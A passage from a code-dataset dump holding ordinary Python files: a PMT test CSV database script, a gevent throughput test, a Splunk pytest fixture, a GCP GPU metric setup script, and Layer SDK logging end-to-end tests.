runinfo/TESTINFO.csv\n'''\nfrom select import select\nfrom multidict import istr\nimport pandas as pd, numpy as np\nimport argparse\nimport datetime\nclass CSVReader(object):\n def __init__(self, filename):\n self.csv = pd.read_csv(filename)\n self.filename = filename\n\nclass PMTINFO(CSVReader):\n # pmt信息获取: PMT,HV_r\n def __init__(self, filename):\n super(PMTINFO, self).__init__(filename)\n self.pmtinfo = self.csv.set_index('PMT')\n def getPMTInfo(self, pmt):\n return self.pmtinfo.loc[pmt]\nclass OriginINFO(CSVReader):\n # 输入的run信息获取:CHANNEL,BOXID,PMT,TRIGGER,MODE\n def __init__(self, filename):\n super(OriginINFO, self).__init__(filename)\n def getPMT(self):\n return self.csv['PMT']\n def getMode(self):\n return self.csv.iloc[0]['MODE']\nclass RUNINFO(CSVReader):\n # RUN信息设置: RUNNO,DATE,ISTRIGGER\n def __init__(self, filename):\n super(RUNINFO, self).__init__(filename)\n self.runinfo = self.csv.set_index('RUNNO')\n def updateAppend(self, runno, date, mode):\n # 更新或新增某一个run\n self.runinfo.loc[runno] = (date, mode)\n def getMode(self, runno):\n return self.runinfo.loc[runno]['MODE']\n def save(self):\n self.runinfo.reset_index().to_csv(self.filename, index=False)\nclass TESTINFO(CSVReader):\n # test信息设置: RUNNO,CHANNEL,BOXID,HV,PMT\n def __init__(self, filename):\n super(TESTINFO, self).__init__(filename)\n def appendRun(self, runno, origininfo, HV):\n origininfo['RUNNO'] = runno\n origininfo['HV'] = HV.astype('float64').values\n self.csv = pd.concat([self.csv, origininfo], join=\"inner\")\n def getChannel(self, runno, istrigger=True):\n testcsv = self.csv.groupby('RUNNO').get_group(runno)\n if istrigger:\n return testcsv.iloc[0]['TRIGGER']\n else:\n return testcsv['CHANNEL'].values\n def save(self):\n self.csv.to_csv(self.filename, index=False)\nif __name__==\"__main__\":\n psr = argparse.ArgumentParser()\n psr.add_argument('--origincsv', help='origin csv file')\n psr.add_argument('--runcsv', help='run csv file')\n psr.add_argument('--testcsv', help='test csv file')\n psr.add_argument('--run', type=int, default=-1, help='run no')\n psr.add_argument('--para', default='istrigger')\n psr.add_argument('-i', dest='ipt', help='ID of PMT')\n psr.add_argument('-o', dest='opt', help='name of output csv')\n args = psr.parse_args()\n if (not (args.para=='pmts' or args.para=='pmtruns')) and args.run==-1:\n print('run parameter is not set and para is {}'.format(args.para))\n exit(0)\n # origininfo = OriginINFO(args.origincsv)\n runinfo = RUNINFO(args.runcsv)\n testinfo = TESTINFO(args.testcsv)\n if args.para=='istrigger':\n print(runinfo.getMode(args.run))\n elif args.para=='triggerch':\n print(testinfo.getChannel(args.run))\n elif args.para=='ch':\n print(' '.join(map(str,testinfo.getChannel(args.run, istrigger=False))))\n elif args.para=='pmts':\n # Default read exclue runs\n excluderuns = np.loadtxt('ExPMT/ExcludeRun.csv')\n excludepmts = np.loadtxt('ExPMT/ExcludePMT.csv', dtype=np.str_)\n pmtsInRuns = np.unique(testinfo.csv[~testinfo.csv['RUNNO'].isin(excluderuns)]['PMT'].values)\n selected = [(pmt not in excludepmts) for pmt in pmtsInRuns]\n print(' '.join(pmtsInRuns[selected]))\n elif args.para=='pmtruns':\n pd.merge(testinfo.csv[testinfo.csv['PMT']==args.ipt], runinfo.csv[['RUNNO', 'MODE']], on='RUNNO').to_csv(args.opt, index=False)\n else:\n print('error')", "repo_name": "greatofdream/pmtTest", "sub_path": "csvDatabase.py", "file_name": "csvDatabase.py", "file_ext": "py", "file_size_in_byte": 3820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 51, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.str_", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 86, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "16310705676", "text": "from greenlet import GreenletExit\nfrom logging import getLogger\nimport random\nimport string\nfrom collections import Counter\nimport gevent\nfrom gevent import Greenlet\nfrom kvclient.exceptions import SystemOverloadError\nfrom testing.base import IndependentNodesTest, ClusteredNodesTest, Test\n\nl = getLogger(__name__)\n\n\nclass BadReturnedValueError(Exception):\n pass\n\n\nclass ThroughputResult(object):\n ADDRESS_KEY = 'node'\n\n def __init__(self, address, values):\n self.address = address\n self.values = values\n\n def to_dict(self):\n return {\n self.ADDRESS_KEY: self.address,\n 'data': self.values,\n 'x_axis': 'Client Count',\n 'y_axis': 'Requests/s',\n }\n\n\nclass ClusteredThroughputResult(ThroughputResult):\n ADDRESS_KEY = 'nodes'\n\n\nclass ThroughputTestBase(Test):\n client_counts = [1, 8, 16, 32]\n test_length_seconds = 60\n\n def set_client_counts(self, client_counts):\n self.client_counts = client_counts\n return self\n\n def set_test_length_seconds(self, test_length_seconds):\n self.test_length_seconds = test_length_seconds\n return self\n\n def run_test(self):\n self.test_running = False\n node_result = []\n\n for client_count in self.client_counts:\n requests = Counter()\n client_creator = self.make_client_creator(requests)\n client_prefixes = [str(i) for i in range(100000, 100000 + client_count)]\n clients = map(client_creator, client_prefixes)\n self.test_running = True\n map(lambda g: g.start(), clients)\n gevent.sleep(self.test_length_seconds)\n self.test_running = False\n gevent.killall(clients)\n r = {\n 'Client Count': client_count,\n 'Requests/s': {k: v/self.test_length_seconds for k, v in requests.items()},\n }\n l.info(r)\n node_result.append(r)\n return node_result\n\n def make_client_creator(self, counter):\n def client_creator(test_prefix):\n return Greenlet(self.client_runner, test_prefix, counter)\n return client_creator\n\n def client_runner(self, test_prefix, counter):\n while self.test_running:\n try:\n self.run_key(test_prefix)\n counter['success'] += 1\n except GreenletExit:\n return\n except SystemOverloadError:\n counter['overload'] += 1\n gevent.sleep()\n except Exception:\n counter['failed'] += 1\n gevent.sleep()\n\n def run_key(self, test_prefix):\n key = test_prefix + self.get_key()\n value = ''.join(random.choice(string.ascii_lowercase) for _ in range(10))\n self.get_client().put(key, value)\n if value != self.get_client().get(key)[0:10]:\n raise BadReturnedValueError()\n self.get_client().delete(key)\n\n def get_key(self, length=26):\n return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))\n\n\nclass ThroughputTest(ThroughputTestBase, IndependentNodesTest):\n result_class = ThroughputResult\n\n\nclass ClusteredThroughputTest(ThroughputTestBase, ClusteredNodesTest):\n result_class = ClusteredThroughputResult\n", "repo_name": "squirly/eece411-kvclient", "sub_path": "testing/throughput_test.py", "file_name": "throughput_test.py", "file_ext": "py", "file_size_in_byte": 3305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "testing.base.Test", "line_number": 38, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 55, "usage_type": "call"}, {"api_name": "gevent.sleep", "line_number": 61, "usage_type": "call"}, {"api_name": "gevent.killall", "line_number": 63, "usage_type": "call"}, {"api_name": "gevent.Greenlet", "line_number": 74, "usage_type": "call"}, {"api_name": "greenlet.GreenletExit", "line_number": 82, "usage_type": "name"}, {"api_name": "kvclient.exceptions.SystemOverloadError", "line_number": 84, "usage_type": "name"}, {"api_name": "gevent.sleep", "line_number": 86, "usage_type": "call"}, {"api_name": "gevent.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 93, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 93, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 100, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 100, "usage_type": "attribute"}, {"api_name": "testing.base.IndependentNodesTest", "line_number": 103, "usage_type": "name"}, {"api_name": "testing.base.ClusteredNodesTest", "line_number": 107, "usage_type": "name"}]} +{"seq_id": "38846888227", "text": "import os\nimport random\nfrom time import sleep\n\nimport pytest\nimport splunklib.client as client\n\n\n@pytest.fixture(scope=\"module\")\ndef setup_wordlist():\n path_to_current_file = os.path.realpath(__file__)\n current_directory = os.path.split(path_to_current_file)[0]\n path_to_file = os.path.join(current_directory, \"data/wordlist.txt\")\n\n wordlist = [line.rstrip('\\n') for line in open(path_to_file)]\n return wordlist\n\n\n@pytest.fixture\ndef get_host_key(setup_wordlist):\n part1 = random.choice(setup_wordlist)\n part2 = random.choice(setup_wordlist)\n host = \"{}-{}\".format(part1, part2)\n\n return host\n\n\n@pytest.fixture\ndef setup_splunk():\n tried = 0\n while True:\n try:\n c = client.connect(username=\"admin\", password=\"Changed@11\", host=\"splunk\", port=\"8089\")\n break\n except ConnectionRefusedError:\n tried += 1\n if tried > 600:\n raise\n sleep(1)\n return c\n", "repo_name": "vishweshkumarp-splunk/splunk-connect-for-syslog", "sub_path": "tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 966, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.realpath", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 9, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 21, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "attribute"}, {"api_name": "splunklib.client.connect", "line_number": 33, "usage_type": "call"}, {"api_name": "splunklib.client", "line_number": 33, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 28, "usage_type": "attribute"}]} +{"seq_id": "36128094383", "text": "import os\n\nfrom google.cloud import monitoring_v3\n\n\nclass MissingProjectIdError(Exception):\n pass\n\n\ndef add_new_metric(project_id, metric_type, desc):\n \"\"\"Add new Metrics for StackDriver.\n\n Args:\n project_id: (str) GCP project id.\n metric_type: (int) MetricDescriptor type.\n desc: (str) MetricDescriptor description.\n\n Raises:\n MissingProjectIdError: GCP Project id is not defined.\n \"\"\"\n if not project_id:\n raise MissingProjectIdError(\n 'Set the environment variable GCLOUD_PROJECT to your GCP Project '\n 'ID.')\n descriptor = monitoring_v3.types.MetricDescriptor()\n descriptor.type = 'custom.googleapis.com/{type}'.format(type=metric_type)\n descriptor.metric_kind = (\n monitoring_v3.enums.MetricDescriptor.MetricKind.GAUGE)\n descriptor.value_type = (\n monitoring_v3.enums.MetricDescriptor.ValueType.INT64)\n descriptor.description = desc\n # Create Metric Descriptor.\n client = monitoring_v3.MetricServiceClient()\n project_name = client.common_project_path(project_id)\n descriptor = client.create_metric_descriptor(project_name, descriptor)\n print('Created {}.'.format(descriptor.name))\n\n\ndef main():\n # Get Project id information.\n project_id = (\n os.environ.get('GOOGLE_CLOUD_PROJECT') or\n os.environ.get('GCLOUD_PROJECT'))\n add_new_metric(project_id, 'utilization_memory',\n 'Metric for GPU utilization.')\n add_new_metric(project_id, 'utilization_gpu',\n 'Metric for GPU memory utilization.')\n add_new_metric(project_id, 'memory_used',\n 'Metric for amount of GPU memory used.')\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "GoogleCloudPlatform/ml-on-gcp", "sub_path": "dlvm/gcp-gpu-utilization-metrics/create_gpu_metrics.py", "file_name": "create_gpu_metrics.py", "file_ext": "py", "file_size_in_byte": 1712, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 472, "dataset": "github-code", "pt": "41", "api": [{"api_name": "google.cloud.monitoring_v3.types.MetricDescriptor", "line_number": 25, "usage_type": "call"}, {"api_name": "google.cloud.monitoring_v3.types", "line_number": 25, "usage_type": "attribute"}, {"api_name": "google.cloud.monitoring_v3", "line_number": 25, "usage_type": "name"}, {"api_name": "google.cloud.monitoring_v3.enums", "line_number": 28, "usage_type": "attribute"}, {"api_name": "google.cloud.monitoring_v3", "line_number": 28, "usage_type": "name"}, {"api_name": "google.cloud.monitoring_v3.enums", "line_number": 30, "usage_type": "attribute"}, {"api_name": "google.cloud.monitoring_v3", "line_number": 30, "usage_type": "name"}, {"api_name": "google.cloud.monitoring_v3.MetricServiceClient", "line_number": 33, "usage_type": "call"}, {"api_name": "google.cloud.monitoring_v3", "line_number": 33, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 42, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "16809977829", "text": "from uuid import UUID\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom sklearn.svm import SVC\n\nimport layer\nfrom layer.clients.layer import LayerClient\nfrom layer.contracts.logged_data import LoggedDataType, Video\nfrom layer.contracts.projects import Project\nfrom layer.decorators import dataset, model, pip_requirements\nfrom layer.exceptions.exceptions import LayerClientResourceNotFoundException\nfrom test.e2e.assertion_utils import E2ETestAsserter\n\n\ndef test_logging_in_remote_execution(\n initialized_project: Project, asserter: E2ETestAsserter, client: LayerClient\n):\n # given\n dataset_name = \"scalar_ds\"\n\n str_tag = \"str_tag\"\n\n @dataset(dataset_name)\n def scalar():\n data = [[1, \"product1\", 15], [2, \"product2\", 20], [3, \"product3\", 10]]\n dataframe = pd.DataFrame(data, columns=[\"Id\", \"Product\", \"Price\"])\n layer.log(\n {\n str_tag: \"bar\",\n }\n )\n return dataframe\n\n # when\n run = layer.run([scalar])\n\n # then\n asserter.assert_run_succeeded(run.id)\n\n first_ds = client.data_catalog.get_dataset_by_name(\n initialized_project.id, dataset_name\n )\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=str_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == \"bar\"\n assert logged_data.logged_data_type == LoggedDataType.TEXT\n assert logged_data.tag == str_tag\n\n\ndef test_dataset_get_metadata_and_changing_old_version_logged_data(\n initialized_project: Project, asserter: E2ETestAsserter, client: LayerClient\n):\n # given\n dataset_name = \"scalar_ds\"\n\n @dataset(dataset_name)\n def scalarv1():\n data = [[1, \"product1\", 15], [2, \"product2\", 20], [3, \"product3\", 10]]\n dataframe = pd.DataFrame(data, columns=[\"Id\", \"Product\", \"Price\"])\n layer.log(\n {\n \"zoo\": 567,\n }\n )\n return dataframe\n\n # same dataset as above, but with different content\n @dataset(dataset_name)\n def scalarv2():\n data = [[11, \"product1\", 155], [22, \"product2\", 200], [3, \"product3\", 1000]]\n dataframe = pd.DataFrame(data, columns=[\"Id\", \"Product\", \"Price\"])\n layer.log(\n {\n \"str_tag\": \"bar\",\n }\n )\n return dataframe\n\n scalarv1()\n\n ds_v1 = layer.get_dataset(dataset_name)\n\n scalarv2()\n ds_v2 = layer.get_dataset(dataset_name)\n\n # add a log to the older version of the dataset\n ds_v1.log({\"foo\": 123})\n\n assert ds_v1.get_metadata(\"zoo\").value() == 567\n assert ds_v1.get_metadata(\"foo\").value() == 123\n\n assert ds_v2.get_metadata(\"str_tag\").value() == \"bar\"\n\n with pytest.raises(LayerClientResourceNotFoundException):\n assert ds_v2.get_metadata(\"zoo\")\n\n with pytest.raises(LayerClientResourceNotFoundException):\n assert ds_v2.get_metadata(\"foo\")\n\n with pytest.raises(LayerClientResourceNotFoundException):\n assert ds_v1.get_metadata(\"str_tag\")\n\n\ndef test_scalar_values_logged(\n initialized_project: Project, asserter: E2ETestAsserter, client: LayerClient\n):\n # given\n dataset_name = \"scalar_ds\"\n\n str_tag = \"str_tag\"\n int_tag = \"int_tag\"\n bool_tag = \"bool_tag\"\n float_tag = \"float_tag\"\n\n @dataset(dataset_name)\n def scalar():\n data = [[1, \"product1\", 15], [2, \"product2\", 20], [3, \"product3\", 10]]\n dataframe = pd.DataFrame(data, columns=[\"Id\", \"Product\", \"Price\"])\n layer.log(\n {\n str_tag: \"bar\",\n int_tag: 123,\n bool_tag: True,\n float_tag: 1.11,\n }\n )\n return dataframe\n\n # when\n scalar()\n\n # then\n first_ds = client.data_catalog.get_dataset_by_name(\n initialized_project.id, dataset_name\n )\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=str_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == \"bar\"\n assert logged_data.logged_data_type == LoggedDataType.TEXT\n assert logged_data.tag == str_tag\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=int_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == \"123\"\n assert logged_data.logged_data_type == LoggedDataType.NUMBER\n assert logged_data.tag == int_tag\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=bool_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == \"True\"\n assert logged_data.logged_data_type == LoggedDataType.BOOLEAN\n assert logged_data.tag == bool_tag\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=float_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == \"1.11\"\n assert logged_data.logged_data_type == LoggedDataType.NUMBER\n assert logged_data.tag == float_tag\n\n\ndef test_list_values_logged(\n initialized_project: Project, asserter: E2ETestAsserter, client: LayerClient\n):\n # given\n dataset_name = \"list_ds\"\n\n list_tag = \"list_tag\"\n numpy_tag = \"numpy_tag\"\n\n @dataset(dataset_name)\n def lists():\n data = [[1, \"product1\", 15], [2, \"product2\", 20], [3, \"product3\", 10]]\n dataframe = pd.DataFrame(data, columns=[\"Id\", \"Product\", \"Price\"])\n layer.log(\n {\n list_tag: [\"a\", \"b\", \"c\"],\n numpy_tag: np.array([1, 2, 3]),\n }\n )\n return dataframe\n\n # when\n lists()\n\n # then\n first_ds = client.data_catalog.get_dataset_by_name(\n initialized_project.id, dataset_name\n )\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=list_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == str([\"a\", \"b\", \"c\"])\n assert logged_data.logged_data_type == LoggedDataType.TEXT\n assert logged_data.tag == list_tag\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=numpy_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == str([1, 2, 3])\n assert logged_data.logged_data_type == LoggedDataType.TEXT\n assert logged_data.tag == numpy_tag\n\n\ndef test_pandas_dataframe_logged(initialized_project: Project, client: LayerClient):\n # given\n ds_tag = \"dataframe_tag\"\n ds_name = \"pandas_dataframe_log\"\n\n @dataset(ds_name)\n def dataset_func():\n d = {\"col1\": [1, 2], \"col2\": [3, 4]}\n df = pd.DataFrame(data=d)\n layer.log({ds_tag: df})\n return df\n\n # then\n dataset_func()\n\n ds = client.data_catalog.get_dataset_by_name(initialized_project.id, ds_name)\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=ds_tag, dataset_build_id=ds.id\n )\n\n assert logged_data.logged_data_type == LoggedDataType.TABLE\n\n\ndef test_markdown_logged(initialized_project: Project, client: LayerClient):\n # given\n ds_tag = \"dataframe_tag\"\n ds_name = \"markdown_dataframe_log\"\n\n markdown = \"\"\"\n # Markdown header\n Some code with [link](http://my link)\n \"\"\"\n\n @dataset(ds_name)\n def dataset_func():\n layer.log({ds_tag: layer.Markdown(markdown)})\n return pd.DataFrame(data={\"col1\": [1, 2], \"col2\": [3, 4]})\n\n # then\n dataset_func()\n\n ds = client.data_catalog.get_dataset_by_name(initialized_project.id, ds_name)\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=ds_tag, dataset_build_id=ds.id\n )\n\n assert logged_data.logged_data_type == LoggedDataType.MARKDOWN\n assert logged_data.value == markdown\n\n\ndef test_image_and_video_logged(initialized_project: Project, client: LayerClient):\n # given\n ds_name = \"multimedia\"\n model_name = \"model_with_stepped_log\"\n pil_image_tag = \"pil_image_tag\"\n image_path_tag = \"image_path_tag\"\n video_path_tag = \"video_path_tag\"\n stepped_pil_image_tab = \"stepped_pil_image_tag\"\n pytorch_tensor_video_tag = \"pytorch_tensor_video_tag\"\n\n @dataset(ds_name)\n def multimedia():\n import os\n from pathlib import Path\n\n from PIL import Image\n\n image = Image.open(f\"{os.getcwd()}/test/e2e/assets/log_assets/layer_logo.jpeg\")\n layer.log({pil_image_tag: image})\n\n image_path = Path(f\"{os.getcwd()}/test/e2e/assets/log_assets/layer_logo.jpeg\")\n layer.log({image_path_tag: image_path})\n\n video_path = Path(f\"{os.getcwd()}/test/e2e/assets/log_assets/layer_video.mp4\")\n layer.log({video_path_tag: video_path})\n\n import torch\n\n tensor_video = torch.rand(10, 3, 100, 200)\n layer.log({pytorch_tensor_video_tag: Video(tensor_video)})\n\n return pd.DataFrame(data={\"col1\": [1, 2], \"col2\": [3, 4]})\n\n multimedia()\n\n ds = client.data_catalog.get_dataset_by_name(initialized_project.id, ds_name)\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=pil_image_tag, dataset_build_id=ds.id\n )\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(pil_image_tag)\n assert logged_data.logged_data_type == LoggedDataType.IMAGE\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=image_path_tag, dataset_build_id=ds.id\n )\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(image_path_tag)\n assert logged_data.logged_data_type == LoggedDataType.IMAGE\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=video_path_tag, dataset_build_id=ds.id\n )\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(video_path_tag)\n assert logged_data.logged_data_type == LoggedDataType.VIDEO\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=pytorch_tensor_video_tag, dataset_build_id=ds.id\n )\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(pytorch_tensor_video_tag)\n assert logged_data.logged_data_type == LoggedDataType.VIDEO\n\n @pip_requirements(packages=[\"scikit-learn==0.23.2\"])\n @model(model_name)\n def train_model():\n import os\n\n from PIL import Image\n from sklearn import datasets\n\n iris = datasets.load_iris()\n clf = SVC()\n result = clf.fit(iris.data, iris.target)\n\n image = Image.open(f\"{os.getcwd()}/test/e2e/assets/log_assets/layer_logo.jpeg\")\n for step in range(4, 6):\n layer.log({stepped_pil_image_tab: image}, step=step)\n\n print(\"model1 computed fully\")\n return result\n\n train_model()\n\n mdl = layer.get_model(model_name)\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=stepped_pil_image_tab, train_id=UUID(mdl.storage_config.train_id.value)\n )\n assert logged_data.logged_data_type == LoggedDataType.IMAGE\n assert len(logged_data.values_with_coordinates) == 2\n assert logged_data.values_with_coordinates[4].startswith(\n \"https://logged-data--layer\"\n )\n assert logged_data.values_with_coordinates[4].endswith(\n f\"{stepped_pil_image_tab}/epoch/4\"\n )\n assert logged_data.values_with_coordinates[5].startswith(\n \"https://logged-data--layer\"\n )\n assert logged_data.values_with_coordinates[5].endswith(\n f\"{stepped_pil_image_tab}/epoch/5\"\n )\n\n\ndef test_file_and_directory_logged(initialized_project: Project, client: LayerClient):\n # given\n ds_name = \"file_and_directory\"\n file_tag = \"file_tag\"\n directory_tag = \"directory_tag\"\n\n @dataset(ds_name)\n def file_and_directory():\n import os\n from pathlib import Path\n\n layer.log(\n {file_tag: Path(f\"{os.getcwd()}/test/e2e/assets/log_assets/somefile.txt\")}\n )\n layer.log(\n {directory_tag: Path(f\"{os.getcwd()}/test/e2e/assets/log_assets/somedir\")}\n )\n\n return pd.DataFrame(data={\"col1\": [1, 2], \"col2\": [3, 4]})\n\n file_and_directory()\n\n ds = client.data_catalog.get_dataset_by_name(initialized_project.id, ds_name)\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=file_tag, dataset_build_id=ds.id\n )\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(file_tag)\n assert logged_data.logged_data_type == LoggedDataType.FILE\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=directory_tag, dataset_build_id=ds.id\n )\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(directory_tag)\n assert logged_data.logged_data_type == LoggedDataType.DIRECTORY\n\n\ndef test_matplotlib_objects_logged(initialized_project: Project, client: LayerClient):\n # given\n figure_tag = \"matplotlib_figure_tag\"\n plot_tag = \"matplotlib_pyplot_tag\"\n\n ds_name = \"ds_with_plots\"\n\n @dataset(ds_name)\n def dataset_func():\n import matplotlib.pyplot as plt\n import seaborn\n\n data = pd.DataFrame({\"col\": [1, 2, 42]})\n plot = seaborn.histplot(data=data, x=\"col\", color=\"green\")\n layer.log({plot_tag: plot})\n\n figure = plt.figure()\n figure.add_subplot(111)\n\n layer.log({figure_tag: figure})\n return pd.DataFrame(data={\"col1\": [1, 2], \"col2\": [3, 4]})\n\n # then\n dataset_func()\n\n ds = client.data_catalog.get_dataset_by_name(initialized_project.id, ds_name)\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=figure_tag, dataset_build_id=ds.id\n )\n\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(figure_tag)\n assert logged_data.logged_data_type == LoggedDataType.IMAGE\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=plot_tag, dataset_build_id=ds.id\n )\n\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(plot_tag)\n assert logged_data.logged_data_type == LoggedDataType.IMAGE\n\n\ndef test_metrics_logged(initialized_project: Project, client: LayerClient):\n # given\n metric_tag_1 = \"metric_tag_1\"\n metric_tag_2 = \"metric_tag_2\"\n\n ds_name = \"metrics_ds\"\n\n @dataset(ds_name)\n def metrics():\n for step in range(1, 5):\n layer.log(\n {metric_tag_1: f\"value {step}\", metric_tag_2: f\"value {step}\"}, step\n )\n return pd.DataFrame(data={\"col1\": [1, 2], \"col2\": [3, 4]})\n\n # then\n metrics()\n\n ds = client.data_catalog.get_dataset_by_name(initialized_project.id, ds_name)\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=metric_tag_1, dataset_build_id=ds.id\n )\n\n assert logged_data.logged_data_type == LoggedDataType.TEXT\n # value from the last step\n assert logged_data.value == \"value 4\"\n", "repo_name": "layerai-archive/sdk", "sub_path": "test/e2e/test_log_types.py", "file_name": "test_log_types.py", "file_ext": "py", "file_size_in_byte": 14938, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 89, "dataset": "github-code", "pt": "41", "api": [{"api_name": "layer.contracts.projects.Project", "line_number": 18, "usage_type": "name"}, {"api_name": "test.e2e.assertion_utils.E2ETestAsserter", "line_number": 18, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 18, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 28, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 29, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 25, "usage_type": "call"}, {"api_name": "layer.run", "line_number": 37, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.TEXT", "line_number": 50, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 50, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 55, "usage_type": "name"}, {"api_name": "test.e2e.assertion_utils.E2ETestAsserter", "line_number": 55, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 55, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 64, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 60, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 75, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 76, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 72, "usage_type": "call"}, {"api_name": "layer.get_dataset", "line_number": 85, "usage_type": "call"}, {"api_name": "layer.get_dataset", "line_number": 88, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 98, "usage_type": "call"}, {"api_name": "layer.exceptions.exceptions.LayerClientResourceNotFoundException", "line_number": 98, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 101, "usage_type": "call"}, {"api_name": "layer.exceptions.exceptions.LayerClientResourceNotFoundException", "line_number": 101, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 104, "usage_type": "call"}, {"api_name": "layer.exceptions.exceptions.LayerClientResourceNotFoundException", "line_number": 104, "usage_type": "argument"}, {"api_name": "layer.contracts.projects.Project", "line_number": 109, "usage_type": "name"}, {"api_name": "test.e2e.assertion_utils.E2ETestAsserter", "line_number": 109, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 109, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 122, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 123, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 119, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.TEXT", "line_number": 145, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 145, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.NUMBER", "line_number": 152, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 152, "usage_type": "name"}, {"api_name": 